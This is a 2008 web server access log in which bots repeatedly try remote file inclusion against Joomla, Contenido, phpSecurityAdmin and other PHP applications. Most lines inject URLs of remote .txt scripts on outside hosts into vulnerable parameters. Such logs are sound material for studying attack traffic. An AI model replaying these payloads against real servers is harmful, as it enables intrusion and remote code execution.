193.202.88.113 - - [29/Jun/2008:17:59:33 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
193.202.88.113 - - [29/Jun/2008:17:59:33 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.811"
64.79.220.3 - - [29/Jun/2008:17:59:36 -0600] "GET /logs/main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 231 "-" "Advanced Browser (http://www.avantbrowser.com)"
64.79.220.3 - - [29/Jun/2008:17:59:37 -0600] "GET /main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 226 "-" "Advanced Browser (http://www.avantbrowser.com)"
219.94.162.56 - - [29/Jun/2008:17:59:39 -0600] "GET /main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
219.94.162.56 - - [29/Jun/2008:17:59:39 -0600] "GET /logs/main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.74.196.90 - - [29/Jun/2008:17:59:51 -0600] "GET /logs/error_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
216.193.201.57 - - [29/Jun/2008:17:59:56 -0600] "GET //includes/header.php?c_temp_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.75"
77.221.157.210 - - [29/Jun/2008:18:00:04 -0600] "GET /logs/access_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 285 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.157.210 - - [29/Jun/2008:18:00:04 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.188.110.30 - - [29/Jun/2008:18:00:13 -0600] "GET /logs/error_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 284 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
219.94.155.28 - - [29/Jun/2008:18:00:18 -0600] "GET /logs/main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
219.94.155.28 - - [29/Jun/2008:18:00:18 -0600] "GET /main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
219.94.128.213 - - [29/Jun/2008:18:00:23 -0600] "GET /logs/main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 231 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
219.94.128.213 - - [29/Jun/2008:18:00:23 -0600] "GET /main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 226 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
210.169.212.106 - - [29/Jun/2008:18:00:25 -0600] "GET /logs/main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
210.169.212.106 - - [29/Jun/2008:18:00:25 -0600] "GET /main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
219.111.8.239 - - [29/Jun/2008:18:00:43 -0600] "GET /main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
89.188.110.30 - - [29/Jun/2008:18:00:44 -0600] "GET /logs/error_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
219.111.8.239 - - [29/Jun/2008:18:00:44 -0600] "GET /logs/main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
195.90.15.14 - - [29/Jun/2008:18:00:58 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.64"
77.221.157.210 - - [29/Jun/2008:18:00:59 -0600] "GET /logs/error_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 284 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.157.210 - - [29/Jun/2008:18:01:00 -0600] "GET /logs/error_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
202.181.99.14 - - [29/Jun/2008:18:01:00 -0600] "GET /main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
202.181.99.14 - - [29/Jun/2008:18:01:01 -0600] "GET /logs/main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
77.74.196.90 - - [29/Jun/2008:18:01:15 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
193.202.88.113 - - [29/Jun/2008:18:01:34 -0600] "GET /logs/error_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 284 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
193.202.88.113 - - [29/Jun/2008:18:01:39 -0600] "GET /logs/error_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
202.181.99.16 - - [29/Jun/2008:18:02:20 -0600] "GET /logs/main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
202.181.99.16 - - [29/Jun/2008:18:02:21 -0600] "GET /main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
89.188.110.30 - - [29/Jun/2008:18:02:50 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
77.221.157.210 - - [29/Jun/2008:18:02:52 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
59.106.13.141 - - [29/Jun/2008:18:03:39 -0600] "GET /logs/main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
59.106.13.141 - - [29/Jun/2008:18:03:39 -0600] "GET /main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
89.108.66.182 - - [29/Jun/2008:18:05:19 -0600] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
89.108.66.182 - - [29/Jun/2008:18:05:25 -0600] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
67.15.205.17 - - [29/Jun/2008:18:06:30 -0600] "GET /logs/access_log.20080518//phpsecurityadmin/include/logout.php?PSA_PATH=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.811"
67.15.205.17 - - [29/Jun/2008:18:06:30 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
67.15.205.17 - - [29/Jun/2008:18:06:30 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
67.15.205.17 - - [29/Jun/2008:18:07:09 -0600] "GET /logs/error_log.20080518//phpsecurityadmin/include/logout.php?PSA_PATH=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.811"
89.108.66.182 - - [29/Jun/2008:18:07:11 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
89.108.66.182 - - [29/Jun/2008:18:07:18 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
202.181.99.47 - - [29/Jun/2008:18:07:49 -0600] "GET /logs/main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
202.181.99.47 - - [29/Jun/2008:18:07:50 -0600] "GET /main.php?pagina=http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
64.22.89.194 - - [29/Jun/2008:18:07:50 -0600] "GET /logs/access_log.20080420/components/com_simpleboard/image_upload.php?sbp=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.812"
189.19.255.240 - - [29/Jun/2008:18:08:44 -0600] "GET //trans/trans.php?trans=ko&page=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
74.6.18.217 - - [29/Jun/2008:18:09:02 -0600] "GET /logs/error_log.20071209 HTTP/1.0" 404 217 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.202.88.113 - - [29/Jun/2008:18:10:07 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
62.99.164.170 - - [29/Jun/2008:18:10:13 -0600] "GET /logs/access_log.20080601//phpraider/authentication/phpbb3/phpbb3.functions.php?http://www.amc-music.de/contenido//contenido/includes/n.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.76"
62.99.164.170 - - [29/Jun/2008:18:10:13 -0600] "GET //phpraider/authentication/phpbb3/phpbb3.functions.php?http://www.amc-music.de/contenido//contenido/includes/n.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.76"
62.99.164.170 - - [29/Jun/2008:18:10:13 -0600] "GET /logs//phpraider/authentication/phpbb3/phpbb3.functions.php?http://www.amc-music.de/contenido//contenido/includes/n.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.76"
195.90.15.14 - - [29/Jun/2008:18:10:42 -0600] "GET /logs/access_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.64"
195.90.15.14 - - [29/Jun/2008:18:10:42 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.64"
195.90.15.14 - - [29/Jun/2008:18:10:43 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.64"
62.99.164.170 - - [29/Jun/2008:18:10:56 -0600] "GET /logs/access_log.20080608//phpraider/authentication/phpbb3/phpbb3.functions.php?http://www.amc-music.de/contenido//contenido/includes/n.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.76"
209.62.118.242 - - [29/Jun/2008:18:11:02 -0600] "GET /logs/access_log//includes/ktedit/toolbar.php?dirDepth=http://www.real-groups.com/media/safe.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.812"
209.62.118.242 - - [29/Jun/2008:18:11:02 -0600] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.real-groups.com/media/safe.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.812"
209.62.118.242 - - [29/Jun/2008:18:11:04 -0600] "GET /logs/error_log//includes/ktedit/toolbar.php?dirDepth=http://www.real-groups.com/media/safe.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.812"
212.71.154.105 - - [29/Jun/2008:18:11:05 -0600] "GET /logs/access_log.20080615/componentscom_rsgalleryrsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
212.71.154.105 - - [29/Jun/2008:18:11:06 -0600] "GET /logs/componentscom_rsgalleryrsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
209.250.234.226 - - [29/Jun/2008:18:11:26 -0600] "GET /logs/error_log.20080427//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.811"
209.250.234.226 - - [29/Jun/2008:18:11:27 -0600] "GET //?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 200 698 "-" "libwww-perl/5.811"
209.250.234.226 - - [29/Jun/2008:18:11:27 -0600] "GET /logs//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 200 4297 "-" "libwww-perl/5.811"
216.12.200.84 - - [29/Jun/2008:18:12:04 -0600] "GET /logs/error_log.20080427//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.63"
216.12.200.84 - - [29/Jun/2008:18:12:04 -0600] "GET //?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 698 "-" "libwww-perl/5.63"
216.12.200.84 - - [29/Jun/2008:18:12:04 -0600] "GET /logs//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 4297 "-" "libwww-perl/5.63"
209.250.234.226 - - [29/Jun/2008:18:12:06 -0600] "GET /logs/error_log.20080608//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.811"
211.93.112.42 - - [29/Jun/2008:18:12:16 -0600] "GET /logs/access_log//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:18:12:16 -0600] "GET //?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 200 698 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:18:12:17 -0600] "GET /logs//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 200 4297 "-" "libwww-perl/5.65"
216.12.200.84 - - [29/Jun/2008:18:12:28 -0600] "GET /logs/error_log.20080608//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.63"
216.118.97.213 - - [29/Jun/2008:18:12:31 -0600] "GET /logs/error_log.20080427//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
216.118.97.213 - - [29/Jun/2008:18:12:31 -0600] "GET //?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 698 "-" "libwww-perl/5.810"
216.118.97.213 - - [29/Jun/2008:18:12:31 -0600] "GET /logs//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 4297 "-" "libwww-perl/5.810"
63.246.64.173 - - [29/Jun/2008:18:12:36 -0600] "GET /logs/error_log.20080511//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 240 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
63.246.64.173 - - [29/Jun/2008:18:12:37 -0600] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 228 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
63.246.64.173 - - [29/Jun/2008:18:12:44 -0600] "GET /logs/access_log.20080511//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 241 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
63.246.64.173 - - [29/Jun/2008:18:13:20 -0600] "GET /logs/error_log.20080511//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
63.246.64.173 - - [29/Jun/2008:18:13:21 -0600] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
63.246.64.173 - - [29/Jun/2008:18:13:21 -0600] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
216.118.97.213 - - [29/Jun/2008:18:13:21 -0600] "GET /logs/error_log.20080608//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
63.246.64.173 - - [29/Jun/2008:18:14:04 -0600] "GET /logs/access_log.20080511//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:18:14:24 -0600] "GET /logs/error_log.20080427//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:18:14:25 -0600] "GET //?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 200 698 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:18:14:25 -0600] "GET /logs//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 200 4297 "-" "libwww-perl/5.65"
195.90.15.14 - - [29/Jun/2008:18:15:56 -0600] "GET /logs/error_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.64"
62.99.164.170 - - [29/Jun/2008:18:15:58 -0600] "GET /logs/access_log.20080601//phpraider/authentication/phpbb3/phpbb3.functions.php=http://www.amc-music.de/contenido//contenido/includes/n.txt??? HTTP/1.1" 404 344 "-" "libwww-perl/5.76"
62.99.164.170 - - [29/Jun/2008:18:15:58 -0600] "GET /logs//phpraider/authentication/phpbb3/phpbb3.functions.php=http://www.amc-music.de/contenido//contenido/includes/n.txt??? HTTP/1.1" 404 324 "-" "libwww-perl/5.76"
62.99.164.170 - - [29/Jun/2008:18:15:58 -0600] "GET //phpraider/authentication/phpbb3/phpbb3.functions.php=http://www.amc-music.de/contenido//contenido/includes/n.txt??? HTTP/1.1" 404 319 "-" "libwww-perl/5.76"
201.130.79.28 - - [29/Jun/2008:18:16:12 -0600] "GET /logs/error_log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.65"
201.130.79.28 - - [29/Jun/2008:18:16:12 -0600] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.65"
201.130.79.28 - - [29/Jun/2008:18:16:12 -0600] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.65"
201.130.79.28 - - [29/Jun/2008:18:16:26 -0600] "GET /logs/error_log.20080420//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
63.246.64.173 - - [29/Jun/2008:18:16:30 -0600] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
201.130.79.28 - - [29/Jun/2008:18:16:44 -0600] "GET /logs/error_log.20080608//config/dbutil.bck.php?confdir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
201.130.79.28 - - [29/Jun/2008:18:16:44 -0600] "GET //config/dbutil.bck.php?confdir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
201.130.79.28 - - [29/Jun/2008:18:16:44 -0600] "GET /logs//config/dbutil.bck.php?confdir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
216.12.200.84 - - [29/Jun/2008:18:16:49 -0600] "GET /logs//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 4297 "-" "libwww-perl/5.63"
216.12.200.84 - - [29/Jun/2008:18:16:49 -0600] "GET //?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 698 "-" "libwww-perl/5.63"
216.118.97.213 - - [29/Jun/2008:18:17:00 -0600] "GET /logs//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 4297 "-" "libwww-perl/5.810"
216.118.97.213 - - [29/Jun/2008:18:17:00 -0600] "GET //?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 698 "-" "libwww-perl/5.810"
62.99.164.170 - - [29/Jun/2008:18:17:01 -0600] "GET /logs/access_log.20080608//phpraider/authentication/phpbb3/phpbb3.functions.php=http://www.amc-music.de/contenido//contenido/includes/n.txt??? HTTP/1.1" 404 344 "-" "libwww-perl/5.76"
201.130.79.28 - - [29/Jun/2008:18:17:39 -0600] "GET /logs/access_log.20080608//config/dbutil.bck.php?confdir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:18:17:49 -0600] "GET /logs/error_log.20080608//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
89.108.66.182 - - [29/Jun/2008:18:18:12 -0600] "GET /logs/access_log.20080518//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
89.108.66.182 - - [29/Jun/2008:18:18:13 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
89.108.66.182 - - [29/Jun/2008:18:18:17 -0600] "GET /logs/access_log.20080518//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
89.108.66.182 - - [29/Jun/2008:18:18:17 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
64.106.202.240 - - [29/Jun/2008:18:18:18 -0600] "GET /logs/error_log.20080427//?mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
